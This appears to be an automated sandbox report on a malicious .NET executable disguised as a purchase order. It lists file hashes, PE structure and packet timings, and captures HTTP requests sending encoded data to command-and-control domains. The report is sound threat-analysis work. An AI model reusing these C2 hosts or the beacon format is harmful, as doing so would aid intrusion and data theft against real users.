                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                          Process:C:\Windows\SysWOW64\isoburn.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Entropy (8bit):7.86515871686289
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                          File name:Purchase Order PO.exe
                                                                                                                          File size:770'560 bytes
                                                                                                                          MD5:28d64b4cc91c016c93eb28e1f465efd2
                                                                                                                          SHA1:a627004d9e1217d7aa46650f6f7c4e4f085d446b
                                                                                                                          SHA256:98ffb783354435168540dc2e8eb4570f865f324169d553ffbad828bf9f33acd3
                                                                                                                          SHA512:2ccd733e9b818cfdd743f5ff98d916af84dade336da3e2c059620fa0326b6ee272576c29d419a083306c56d5327f315568e0cf1cc846b7f3c2d760cce11c3e5c
                                                                                                                          SSDEEP:12288:0rFK4A9bVRf/7XiMvJgMnEjH5k4yOphkjhQBlcYOcxVvs9d2NORdkYqUuU6:GFKV17XRgMnEjZwckYFPVv2dNRdkY76
                                                                                                                          TLSH:F3F4016032EC1F25E47EBBF265B4511943B7792A1A31E60E0ECA64EB0773B40CA52F57
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z?g..............0......$......N.... ........@.. ....................... ............@................................
                                                                                                                          Icon Hash:4fd8dadadacad80f
                                                                                                                          Entrypoint:0x4bba4e
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x673F5AAC [Thu Nov 21 16:07:08 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                          Instruction
                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbb9fc | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbc000 | 0x21c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb9a54 | 0xb9c00 | 2e251fda3f948f03a6fcb394b8dbb933 | False | 0.9117558146870794 | data | 7.872500225134944 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbc000 | 0x21c4 | 0x2200 | b6971994355b053dd46fc937a7815c1b | False | 0.8576516544117647 | data | 7.433260938935609 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc0000 | 0xc | 0x200 | 58254d3d947f93323198353b92c95b02 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xbc100 | 0x1b63 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9516474112109542
RT_GROUP_ICON | 0xbdc74 | 0x14 | data | | | 1.05
RT_VERSION | 0xbdc98 | 0x32c | data | | | 0.43103448275862066
RT_MANIFEST | 0xbdfd4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                          Nov 22, 2024 15:13:08.829132080 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829204082 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829217911 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829243898 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829258919 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829391003 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829405069 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829418898 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:09.838428020 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:09.838730097 CET4990880192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:10.224404097 CET4990880192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:10.344780922 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:11.246210098 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:11.365820885 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:11.366064072 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:11.377552986 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:11.497071981 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:12.517416954 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:12.518121958 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:12.518189907 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:12.521348953 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:12.641017914 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:18.075335026 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:18.195732117 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:18.195815086 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:18.212018967 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:18.331820965 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:19.533786058 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:19.533951044 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:19.533983946 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:19.534020901 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:19.534121990 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:19.724404097 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:20.744273901 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:20.863791943 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:20.863878965 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:20.880209923 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:20.999783039 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:22.157048941 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:22.157167912 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:22.157183886 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:22.157262087 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:22.396472931 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:23.416342974 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:23.535967112 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.536865950 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:23.551826000 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:23.671938896 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.671963930 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672005892 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672019005 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672068119 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672113895 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672224998 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672239065 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672283888 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:24.852082968 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:24.852154016 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:24.852296114 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:24.932869911 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:24.932928085 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:25.067965984 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:26.088725090 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:26.208838940 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:26.208935976 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:26.245233059 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:26.365673065 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623074055 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623101950 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623114109 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623127937 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623260975 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:27.630239010 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:27.750014067 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:33.555138111 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:33.678841114 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:33.678939104 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:33.694235086 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:33.813765049 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:35.208810091 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:35.226351976 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:35.226686954 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:35.228786945 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:35.228786945 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:35.328274012 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:35.328443050 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:36.228735924 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:36.348588943 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:36.348671913 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:36.365066051 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:36.485749006 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:37.882256031 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:37.935635090 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:37.935703039 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:37.935818911 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:37.935818911 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:38.001816034 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:38.002085924 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:38.899576902 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:39.019437075 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.019535065 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:39.033026934 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:39.152862072 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.152892113 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.152973890 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.152990103 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153052092 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153098106 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153168917 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153187990 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153228045 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:40.536807060 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:40.565495014 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:40.565568924 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:40.658556938 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:40.658626080 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:41.555692911 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:41.676389933 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:41.676619053 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:41.686280012 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:41.805705070 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:43.188049078 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:43.188133001 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:43.188232899 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:43.191978931 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:43.311777115 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:49.223150015 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:49.342824936 CET8050007101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:49.343000889 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:49.356738091 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:49.478080988 CET8050007101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:50.825798035 CET8050007101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:50.825931072 CET8050007101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:50.825983047 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:50.865106106 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:51.910887003 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:52.107568979 CET8050013101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:52.110739946 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:52.126336098 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:52.351279974 CET8050013101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:53.593094110 CET8050013101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:53.593246937 CET8050013101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:53.593456984 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:53.633696079 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:54.758420944 CET5001980192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:54.878412962 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:54.878510952 CET5001980192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:14:58.893182039 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893204927 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893224955 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893238068 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893300056 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893311977 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893366098 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893410921 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893439054 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:00.164673090 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:00.164900064 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:00.170592070 CET5005080192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:00.290482998 CET5005080192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:01.307059050 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:01.426564932 CET8050051146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:01.428967953 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:01.441237926 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:01.560856104 CET8050051146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:02.766300917 CET8050051146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:02.766333103 CET8050051146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:02.766453981 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:02.771516085 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:02.891127110 CET8050051146.88.233.115192.168.2.4
                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          0 | 192.168.2.4 | 49743 | 31.186.11.114 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Nov 22, 2024 15:11:59.254071951 CET | 354 | OUT | GET /qygv/?o6=SpTPojpx7H&Mr60=PNgLNtFNavTWVACgmh5xCzkhObl4Vn/3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wmu6EeWsOoRA0CokgLA8hMNXivrFO8nzFLsU= HTTP/1.1
                                                                                                                          Host: www.cyperla.xyz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:00.626995087 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          content-type: text/html
                                                                                                                          content-length: 1251
                                                                                                                          date: Fri, 22 Nov 2024 14:12:00 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 22, 2024 15:12:00.627018929 CET | 253 | IN
                                                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49784 | 194.76.119.60 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:12:17.854099989 CET | 633 | OUT | POST /qx5d/ HTTP/1.1
                                                                                                                          Host: www.cstrategy.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.cstrategy.online
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.cstrategy.online/qx5d/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYzpaUyw7zmCQKhLm5N21Kj2/ZE9qlNlIZQ==
Nov 22, 2024 15:12:19.214692116 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:18 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 178
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.cstrategy.online/qx5d/
                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49790 | 194.76.119.60 | 80 | 3104 | C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 15:12:20.518194914 CET | 653 | OUT | POST /qx5d/ HTTP/1.1
                                                                                                                          Host: www.cstrategy.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.cstrategy.online
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.cstrategy.online/qx5d/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Ascii: Mr60=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjSMED0eoOYBCc9WtpqW/g//GFN+sWmkf7k=
